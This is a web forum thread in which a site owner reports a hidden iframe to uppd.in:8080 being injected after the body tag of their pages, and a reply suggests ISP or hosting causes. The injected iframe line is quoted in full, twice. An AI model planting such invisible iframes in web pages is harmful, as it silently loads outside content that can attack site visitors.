hello

i am facing a problem, but i am not able to find out the reason and how i can permanently sort out it.

<iframe src="http://uppd.in:8080/index.php" width=178 height=113 style="visibility: hidden"></iframe>

the above line appears in my code automatically after <body> tag. and because of hidden frame a space appear at top of the page and all of view disturbs due to this iframe. what its coming? Is some one try to hack my site? how can i resolve it?

hello

i am facing a problem, but i am not able to find out the reason and how i can permanently sort out it.

<iframe src="http://uppd.in:8080/index.php" width=178 height=113 style="visibility: hidden"></iframe>

the above line appears in my code automatically after <body> tag. and because of hidden frame a space appear at top of the page and all of view disturbs due to this iframe. what its coming? Is some one try to hack my site? how can i resolve it?

Does this problem happen if you view the webpage via another internet provider? I have found that when I was running mobile internet, the HTML source that I received for all websites was doctored (presumably for increased performance). The first thing you will need to do is make sure it's happening at the server side.

If this is server side, then there may be another cause.
Do you have free web-hosting? If so, is it a term of the free hosting that your content is restricted? It may be that the host will wish to display their own adverts in the iframe.

Do you have any php content that is producing the html content?
What happens if you just use static HTML? i.e. does plain HTML get altertered?

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.